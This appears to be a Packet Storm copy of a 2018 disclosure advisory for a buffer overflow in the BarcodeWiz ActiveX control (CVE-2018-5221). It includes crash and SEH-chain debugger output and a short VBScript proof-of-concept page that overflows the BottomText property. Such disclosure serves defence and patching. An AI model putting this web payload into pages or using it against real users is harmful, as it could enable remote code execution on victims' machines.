what you don't know can hurt you

BarcodeWiz ActiveX Control Buffer Overflow

BarcodeWiz ActiveX Control Buffer Overflow
Posted Jan 6, 2018
Authored by hyp3rlinx | Site hyp3rlinx.altervista.org

BarcodeWiz ActiveX Control versions prior to 6.7 suffers from a buffer overflow vulnerability.

tags | exploit, overflow, activex
advisories | CVE-2018-5221
MD5 | 5a6d87beda1eb2117a5a9eb2725e9ddb

BarcodeWiz ActiveX Control Buffer Overflow

Change Mirror Download
[+] Credits: John Page (aka hyp3rlinx)    
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/BARCODEWIZ-v6.7-ACTIVEX-COMPONENT-BUFFER-OVERFLOW.txt
[+] ISR: ApparitionSec



Vendor:
=================
www.barcodewiz.com


Product:
=============
BarcodeWiz ActiveX Control < 6.7

BarCodeWiz OnLabel. Generates dynamic barcodes from your imported Excel, CSV, or Access files. Print auto incrementing barcodes;
Choose from hundreds of label layouts; Export as PDF or XPS.


Vulnerability Type:
===================
Buffer Overflow


CVE Reference:
==============
CVE-2018-5221


Security Issue:
================
BarcodeWiz.DLL BottomText and TopText propertys suffer from buffer overflow vulnerability resulting in (SEH) "Structured Exceptional Handler" overwrite .
This can be exploited by a remote attacker to potentially execute arbitrary attacker supplied code. User would have to visit a malicious webpage using
InternetExplorer where the exploit could be triggered.


SEH chain of main thread
Address SE handler
0018DAC0 kernel32.754E48F3
0018EE34 41414141
41414141 *** CORRUPT ENTRY ***


Exception Code: ACCESS_VIOLATION
Disasm: 2045665 MOV [EDX+ECX],AL (BarcodeWiz.DLL)

SEH Chain:
--------------------------------------------------
1 41414141


Called From Returns To
--------------------------------------------------
BarcodeWiz.2045665 BarcodeWiz.202FF50
BarcodeWiz.202FF50 41414141
41414141 41414141
41414141 41414141
41414141 41414141
41414141 41414141
41414141 41414141


Report for Clsid: {CD3B09F1-26FB-41CD-B3F2-E178DFD3BCC6}
RegKey Safe for Script: True
RegKey Safe for Init: True
Implements IObjectSafety: True
IDisp Safe: Safe for untrusted: caller,data
IPersist Safe: Safe for untrusted: caller,data
IPStorage Safe: Safe for untrusted: caller,data


Exploit/POC:
=============
<object classid='clsid:CD3B09F1-26FB-41CD-B3F2-E178DFD3BCC6' id='VICTIM' />
<script language='vbscript'>

PAYLOAD=String(12308, "A")

VICTIM.BottomText = PAYLOAD

</script>




Network Access:
===============
Remote



Severity:
=========
High



Disclosure Timeline:
=============================
Vendor Notification: December 26, 2017
Vendor Acknowledgement: January 2, 2018
Vendor "updated version released this week." : January 2, 2018
January 6, 2018 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx
Login or Register to add favorites

File Archive:

November 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    2 Files
  • 2
    Nov 2nd
    9 Files
  • 3
    Nov 3rd
    15 Files
  • 4
    Nov 4th
    90 Files
  • 5
    Nov 5th
    22 Files
  • 6
    Nov 6th
    16 Files
  • 7
    Nov 7th
    1 Files
  • 8
    Nov 8th
    1 Files
  • 9
    Nov 9th
    40 Files
  • 10
    Nov 10th
    27 Files
  • 11
    Nov 11th
    28 Files
  • 12
    Nov 12th
    13 Files
  • 13
    Nov 13th
    18 Files
  • 14
    Nov 14th
    2 Files
  • 15
    Nov 15th
    2 Files
  • 16
    Nov 16th
    29 Files
  • 17
    Nov 17th
    15 Files
  • 18
    Nov 18th
    15 Files
  • 19
    Nov 19th
    21 Files
  • 20
    Nov 20th
    16 Files
  • 21
    Nov 21st
    1 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    19 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close